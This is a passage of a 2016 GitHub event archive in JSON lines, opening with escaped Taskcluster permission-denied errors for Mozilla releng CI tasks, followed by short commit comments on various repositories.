403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"U4IF_XlmRFiFZc68iIhz0A\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.closed\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.319Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.319Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"KlSSpq8IS6uTkhyZQ7zKLg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.319Z\\\"\\n}\\n  time:     2016-09-23T13:10:00.475Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"U4IF_XlmRFiFZc68iIhz0A\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_docs\",\n                        \"description\": \"Test, build and deploy releng_docs\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_docs\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.closed\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"ddcbdbb99491947b6efdcebed5392debf43921f2\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T13:09:59.319Z\",\n                    \"deadline\": \"2016-09-24T13:09:59.319Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"KlSSpq8IS6uTkhyZQ7zKLg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T13:09:59.319Z\"\n                },\n                \"time\": \"2016-09-23T13:10:00.475Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"VNFPMFvjQlmg5hRC3cCxcQ\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.closed\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.320Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.320Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"KlSSpq8IS6uTkhyZQ7zKLg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.320Z\\\"\\n}\\n  time:     2016-09-23T13:10:00.489Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"VNFPMFvjQlmg5hRC3cCxcQ\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.closed\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.320Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.320Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"KlSSpq8IS6uTkhyZQ7zKLg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.320Z\\\"\\n}\\n  time:     2016-09-23T13:10:00.489Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"VNFPMFvjQlmg5hRC3cCxcQ\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_frontend\",\n                        \"description\": \"Test, build and deploy releng_frontend\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.closed\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"ddcbdbb99491947b6efdcebed5392debf43921f2\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T13:09:59.320Z\",\n                    \"deadline\": \"2016-09-24T13:09:59.320Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"KlSSpq8IS6uTkhyZQ7zKLg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T13:09:59.320Z\"\n                },\n                \"time\": \"2016-09-23T13:10:00.489Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-23T13:10:00Z"}
{"id":"4608450467","type":"CommitCommentEvent","actor":{"login":"webdevium"},"repo":{"name":"Vladnev/Laravel"},"payload":{"comment":{"id":19145913,"position":45,"line":45,"path":"app/UserFunc.php","commit_id":"f5c6c10867aabca89cb2c8ccfd9f4cdc4eefa3cb","created_at":"2016-09-23T13:10:19Z","updated_at":"2016-09-23T13:10:19Z","body":"Не нужная проверка. Laravel все сделал до нас. \r\nПросто `if ($userInfo) {}`"}},"created_at":"2016-09-23T13:10:19Z"}
{"id":"4608454241","type":"CommitCommentEvent","actor":{"login":"sndnvaps"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":19145917,"position":33,"line":33,"path":"conn_init/conn_init.c","commit_id":"5fd819dcca2ce41b0c7fa56d010dca6cbc3cc0d0","created_at":"2016-09-23T13:11:05Z","updated_at":"2016-09-23T13:11:05Z","body":"this is not exists in aries "}},"created_at":"2016-09-23T13:11:05Z"}
{"id":"4608456626","type":"CommitCommentEvent","actor":{"login":"artbear"},"repo":{"name":"dmpas/OneScript"},"payload":{"comment":{"id":19145921,"position":null,"line":null,"path":null,"commit_id":"ac4aa56921b31e2c0e9ad19ea02551fcc2c1bf4b","created_at":"2016-09-23T13:11:33Z","updated_at":"2016-09-23T13:11:33Z","body":"Хорошая опечаточка :)"}},"created_at":"2016-09-23T13:11:33Z"}
{"id":"4608459484","type":"CommitCommentEvent","actor":{"login":"brnikita"},"repo":{"name":"soshace/EOP-2"},"payload":{"comment":{"id":19145926,"position":31,"line":31,"path":"public/js/components/UserAdd.jsx","commit_id":"4ce3aa926f05aba4c6e9217b6b042fd00bac5eac","created_at":"2016-09-23T13:12:10Z","updated_at":"2016-09-23T13:12:10Z","body":"Лучше 'event' вместо 'e' написать "}},"created_at":"2016-09-23T13:12:10Z"}
{"id":"4608460274","type":"CommitCommentEvent","actor":{"login":"webdevium"},"repo":{"name":"Vladnev/Laravel"},"payload":{"comment":{"id":19145928,"position":62,"line":62,"path":"app/UserFunc.php","commit_id":"f5c6c10867aabca89cb2c8ccfd9f4cdc4eefa3cb","created_at":"2016-09-23T13:12:20Z","updated_at":"2016-09-23T13:12:20Z","body":"```\r\n$user = User::find($id);\r\n$user->imgURL = $imgPath.$filename;\r\n$user->save();\r\n```\r\n\r\nВроде больше строк, но когда нужно будет изменить что-то еще, то будет удобней, чем на низком уровне использовать фасад DB"}},"created_at":"2016-09-23T13:12:20Z"}
{"id":"4608472445","type":"CommitCommentEvent","actor":{"login":"natalia-osa"},"repo":{"name":"OrdnanceSurvey/mapbox-ios-sdk"},"payload":{"comment":{"id":19145964,"position":30,"line":45,"path":"MapView/Map/RMConfiguration.m","commit_id":"5d12b057ae9c199794077d0b3daddbeac28b5eb0","created_at":"2016-09-23T13:14:45Z","updated_at":"2016-09-23T13:14:45Z","body":"Fixed in 95d54e4b575a5e298594a3514c53feac32f4bd20."}},"created_at":"2016-09-23T13:14:45Z"}
{"id":"4608475665","type":"CommitCommentEvent","actor":{"login":"fututer"},"repo":{"name":"fututer/StepOrigin"},"payload":{"comment":{"id":19145969,"position":null,"line":null,"path":null,"commit_id":"35a3c08994d29934b9d15fc88a324959dd4e6b4d","created_at":"2016-09-23T13:15:22Z","updated_at":"2016-09-23T13:15:22Z","body":"1.开启服务器：npm run app\r\n 2.实时更新前台js数据：webpack -w\r\n 3.在app.js中我把很多的路由都有一个来实现，所以在测试的时候需要更改或者注释某些部分\r\n 4.在index.js中有JSONP跨域(只支持get)，CORS跨域(任何请求),在测试某个请求的时候，需要注释掉其他部分。"}},"created_at":"2016-09-23T13:15:22Z"}
{"id":"4608478883","type":"CommitCommentEvent","actor":{"login":"natalia-osa"},"repo":{"name":"OrdnanceSurvey/mapbox-ios-sdk"},"payload":{"comment":{"id":19145974,"position":38,"line":38,"path":"MapView/Map/NSURLSession+RMUserAgent.m","commit_id":"bae59738f9e43c32630fd33f105a546c53062093","created_at":"2016-09-23T13:16:01Z","updated_at":"2016-09-23T13:16:01Z","body":"Fixed in 95d54e4b575a5e298594a3514c53feac32f4bd20."}},"created_at":"2016-09-23T13:16:01Z"}
{"id":"4608479982","type":"CommitCommentEvent","actor":{"login":"natalia-osa"},"repo":{"name":"OrdnanceSurvey/mapbox-ios-sdk"},"payload":{"comment":{"id":19145975,"position":7,"line":42,"path":"MapView/Map/NSURLSession+RMUserAgent.m","commit_id":"81a22846d49ff6e4ce0158d7fb86a50f3c448371","created_at":"2016-09-23T13:16:14Z","updated_at":"2016-09-23T13:16:14Z","body":"Added in 95d54e4b575a5e298594a3514c53feac32f4bd20."}},"created_at":"2016-09-23T13:16:14Z"}
{"id":"4608481547","type":"CommitCommentEvent","actor":{"login":"thommath"},"repo":{"name":"thommath/WebProject"},"payload":{"comment":{"id":19145980,"position":null,"line":null,"path":null,"commit_id":"96da02b263285b8758afdc0f727f7d8fe5504957","created_at":"2016-09-23T13:16:33Z","updated_at":"2016-09-23T13:16:33Z","body":"Nice! \r\nSer over rundt 17 og gjør kanskje noen endringer selv. Bra at du fikset id-ene "}},"created_at":"2016-09-23T13:16:33Z"}
{"id":"4608485295","type":"CommitCommentEvent","actor":{"login":"tgabi333"},"repo":{"name":"andyet/SimpleWebRTC"},"payload":{"comment":{"id":19146004,"position":null,"line":null,"path":null,"commit_id":"50e70f63e51b285a7346e4621eef397c6fe287a4","created_at":"2016-09-23T13:17:17Z","updated_at":"2016-09-23T13:17:17Z","body":"@fippo Could you please release it?"}},"created_at":"2016-09-23T13:17:17Z"}
{"id":"4608487779","type":"CommitCommentEvent","actor":{"login":"FleetAdmiral"},"repo":{"name":"felicity-buzz-2k16/buzz2k16-main-website"},"payload":{"comment":{"id":19146007,"position":null,"line":null,"path":null,"commit_id":"032a9b8b5ecf07939b9f80844ecb08abb0f0e74c","created_at":"2016-09-23T13:17:47Z","updated_at":"2016-09-23T13:17:47Z","body":"@meghprkh 👍 "}},"created_at":"2016-09-23T13:17:47Z"}
{"id":"4608490168","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19146014,"position":null,"line":null,"path":null,"commit_id":"47d6befd9d3e044ab98bfa71e2e6a026852fed4b","created_at":"2016-09-23T13:18:16Z","updated_at":"2016-09-23T13:18:16Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35982/testReport/) for this commit**"}},"created_at":"2016-09-23T13:18:16Z"}
{"id":"4608491394","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19146018,"position":null,"line":null,"path":null,"commit_id":"df6ce0161f0ef6341493b05aae1e4ed8b6797bb5","created_at":"2016-09-23T13:18:31Z","updated_at":"2016-09-23T13:18:31Z","body":"we just saved the game from feminists"}},"created_at":"2016-09-23T13:18:31Z"}
{"id":"4608497757","type":"CommitCommentEvent","actor":{"login":"floion"},"repo":{"name":"resin-io/resin-supervisor"},"payload":{"comment":{"id":19146030,"position":null,"line":null,"path":null,"commit_id":"81cb27a87613b109bfaaf36b11a2b5dd7139d248","created_at":"2016-09-23T13:19:52Z","updated_at":"2016-09-23T13:19:52Z","body":"LGTM"}},"created_at":"2016-09-23T13:19:52Z"}
{"id":"4608504057","type":"CommitCommentEvent","actor":{"login":"cstefanache"},"repo":{"name":"cstefanache/angular2-img-cropper"},"payload":{"comment":{"id":19146044,"position":null,"line":null,"path":null,"commit_id":"d9d33299b90c74c55d051eecfe52ef8d240c0c82","created_at":"2016-09-23T13:21:05Z","updated_at":"2016-09-23T13:21:05Z","body":"I will remove ng2-styles from the test app - it was just a fun project that I've been working on but I don't think that has any future"}},"created_at":"2016-09-23T13:21:05Z"}
{"id":"4608504381","type":"CommitCommentEvent","actor":{"login":"dmpas"},"repo":{"name":"dmpas/OneScript"},"payload":{"comment":{"id":19146045,"position":null,"line":null,"path":null,"commit_id":"ac4aa56921b31e2c0e9ad19ea02551fcc2c1bf4b","created_at":"2016-09-23T13:21:09Z","updated_at":"2016-09-23T13:21:09Z","body":"Копипаст во всей его красе."}},"created_at":"2016-09-23T13:21:09Z"}
